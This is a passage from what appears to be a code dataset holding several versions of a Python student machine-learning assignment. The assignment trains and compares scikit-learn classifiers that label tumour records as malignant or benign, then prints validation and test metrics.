- - - - - - - - - - - - - - - - - - - - - -\n\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# ADDITIONAL FUNCTIONS \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \ndef print_prediction_report(y_pred, y_true, names):\n '''\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n '''\n \n labels = (1,0)\n \n # Confusion matrix.\n print('\\nConfusion Matrix:') \n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names)==len(cm)\n assert cm.shape == (2,2) \n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:',names[0], names[1], 'All'))\n print(\"ACTUAL: \")\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm[0,0], '','(FN)', cm[0,1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm[1,0], '','(TN)', cm[1,1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All',sum(cm[:,0]), sum(cm[:,1]), sum(sum(cm))))\n \n # Classification report.\n print(\"\\nClassification Report:\")\n print(metrics.classification_report(y_true, y_pred, labels, target_names=names))\n \n # Miscellaneous metrics.\n print(\"\\nOverall Metrics:\")\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true, y_pred) ))\n print('{:14} {:.2f}'.format('variance:', metrics.explained_variance_score(y_true, y_pred) ))\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n \ndef print_cv_report(r):\n '''\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n '''\n \n score_grid = [\"accuracy\", \"precision\", \"recall\", \"f1\", \"roc_auc\"]\n \n # Print title bar.\n print(\"\\n\\n- - - VALIDATION REPORT - - -\") \n \n # Print training and test (\"validation\") scores on all metrics. \n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', \n np.mean(r['train_%s' % metric]),\n np.mean(r['test_%s' % metric] )))\n \n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef print_grid_search_report(grid):\n '''\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n '''\n\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n \n # Print the parameter optimized and the ideal value found\n print(\"\\n\\n- - - VALIDATION REPORT - - -\")\n print(\"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\".format(\n grid.refit, \n list(grid.best_params_.keys())[0], \n list(grid.best_params_.values())[0]) ) \n \n # For the ideal parameter value, print train and test (\"validation\") scores\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', \n r['mean_train_%s' % metric][i],\n r['mean_test_%s' % metric][i] ))\n \n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef plot_grid_search_results(clf): \n # Organize data and labels\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring \n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n\n # Plot the organized data and labels\n p = plt\n idx=0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx+=1\n \n # Configure plot and show\n p.title(\"Hyperparameter Optimization by Cross-Validation\")\n p.xlabel(param_name + \" value\")\n if param_name =='gamma': p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc=\"lower right\")\n p.grid(True)\n p.show()\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef print_introduction(team_array):\n '''\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n '''\n \n print(\"\\n\\n***************************************************************\")\n print(\" CAB320 ASSIGNMENT 2: MACHINE LEARNING \")\n print(\"***************************************************************\")\n print(\"\\nTEAM MEMBERS:\")\n\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0],':',person[1], person[2]))\n \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n \ndef print_clf_intro(name, params=None):\n '''\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n '''\n \n print(\"\\n\\n\\n\\n***************************************************************\")\n print(\"* {} CLASSIFIER\".format(name))\n if(params is not None):\n print(\"\\nHyperparameter: \" + list(params.keys())[0]) # JUST KEY\n print(\"Values Tested: {} values from {} to {}\".format( \n len( list(params.values())[0] ), \n min( list(params.values())[0] ), \n max( list(params.values())[0] ) ) )\n print(\"\\nWorking...\")\n \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n \n \n \n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# MAIN FUNCTION\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \nif __name__ == \"__main__\":\n\n# --------------------- Data-specific variables ----------------------\n # Change these as required. \n class_labels = (\"Malignant\", \"Benign\") #corresponding to (1,0) binary vals\n path_to_data = 'medical_records.data'\n test_set_ratio = 0.2\n \n # Store a list of all parameters necesary for testing and classification\n function_list = [\n build_NB_classifier,\n build_DT_classifier,\n build_NN_classifier,\n build_SVM_classifier\n ]\n\n\n# ------------------------ Experiment process ------------------------\n\n # Print the team.\n print_introduction(my_team())\n \n # Pre-process the dataset.\n data, labels = prepare_dataset(path_to_data)\n \n # Split the dataset into the corresponding ratio for crossvalidation. \n # Set random_state to a hard-coded number to ensure repeatability.\n train_data,test_data,train_labels,test_labels = model_selection.train_test_split(\n data, labels, test_size=test_set_ratio, random_state=1) \n \n # Print split information.\n print('\\n\\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(\n (1-test_set_ratio)*100, len(train_data), sum(train_labels), (sum(train_labels)*100)/len(train_data)))\n print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(\n test_set_ratio*100, len(test_data), sum(test_labels), (sum(test_labels)*100)/len(test_data)))\n\n # Analyze and use each classifier, show results. \n for function in function_list:\n \n if function is build_NB_classifier: \n # Indicator for NBC. \n # Handle this differently, since no optimization is necessary.\n t0 = time.time()\n clf, cv_results = function(train_data, train_labels)\n print_cv_report(cv_results)\n \n else:\n # Create appropriate optimized classifier and report VALIDATION metrics.\n t0 = time.time()\n clf = function(train_data, train_labels)\n print_grid_search_report(clf)\n plot_grid_search_results(clf)\n \n t1 = time.time() \n print(\"\\nCross-validation, optimization, and fitting took {:.6f} seconds total.\".format(t1-t0))\n\n # Quantify the classifier's performance on the TRAINING set.\n pred_train_labels = clf.predict(train_data)\n t2 = time.time()\n print(\"\\n\\n- - - TRAINING REPORT - - -\")\n print_prediction_report(pred_train_labels, train_labels, class_labels)\n print(\"\\nPrediction on training set took {:.6f} seconds.\".format(t2-t1))\n \n # Quantify the classifier's performance on TEST SET. \n t3 = time.time()\n pred_labels = clf.predict(test_data)\n t4 = time.time()\n print(\"\\n\\n- - - TEST REPORT - - -\")\n print_prediction_report(pred_labels, test_labels, class_labels)\n print(\"\\nPrediction on test set took {:.6f} seconds.\".format(t4-t3))\n",
"<docstring token>\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import naive_bayes, neighbors, tree, svm, model_selection, metrics\nimport warnings\nimport time\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\ndef build_NN_classifier(X_training, y_training):\n \"\"\" \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'n_neighbors': np.linspace(1, 200, 200, dtype=int)}\n print_clf_intro('NEAREST NEIGHBOR', params)\n knn = model_selection.GridSearchCV(neighbors.KNeighborsClassifier(),\n params, return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n knn.fit(X_training, y_training)\n return knn\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\nif __name__ == '__main__':\n class_labels = 'Malignant', 'Benign'\n path_to_data = 'medical_records.data'\n test_set_ratio = 0.2\n function_list = [build_NB_classifier, build_DT_classifier,\n build_NN_classifier, build_SVM_classifier]\n print_introduction(my_team())\n data, labels = prepare_dataset(path_to_data)\n train_data, test_data, train_labels, test_labels = (model_selection.\n train_test_split(data, labels, test_size=test_set_ratio,\n random_state=1))\n print(\n '\\n\\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'\n .format((1 - test_set_ratio) * 100, len(train_data), sum(\n train_labels), sum(train_labels) * 100 / len(train_data)))\n print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.\n format(test_set_ratio * 100, len(test_data), sum(test_labels), sum(\n test_labels) * 100 / len(test_data)))\n for function in function_list:\n if function is build_NB_classifier:\n t0 = time.time()\n clf, cv_results = function(train_data, train_labels)\n print_cv_report(cv_results)\n else:\n t0 = time.time()\n clf = function(train_data, train_labels)\n print_grid_search_report(clf)\n plot_grid_search_results(clf)\n t1 = time.time()\n print(\n '\\nCross-validation, optimization, and fitting took {:.6f} seconds total.'\n .format(t1 - t0))\n pred_train_labels = clf.predict(train_data)\n t2 = time.time()\n print('\\n\\n- - - TRAINING REPORT - - -')\n print_prediction_report(pred_train_labels, train_labels, class_labels)\n print('\\nPrediction on training set took {:.6f} seconds.'.format(t2 -\n t1))\n t3 = time.time()\n pred_labels = clf.predict(test_data)\n t4 = time.time()\n print('\\n\\n- - - TEST REPORT - - -')\n print_prediction_report(pred_labels, test_labels, class_labels)\n print('\\nPrediction on test set took {:.6f} seconds.'.format(t4 - t3))\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\ndef build_NN_classifier(X_training, y_training):\n \"\"\" \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'n_neighbors': np.linspace(1, 200, 200, dtype=int)}\n print_clf_intro('NEAREST NEIGHBOR', params)\n knn = model_selection.GridSearchCV(neighbors.KNeighborsClassifier(),\n params, return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n knn.fit(X_training, y_training)\n return knn\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n 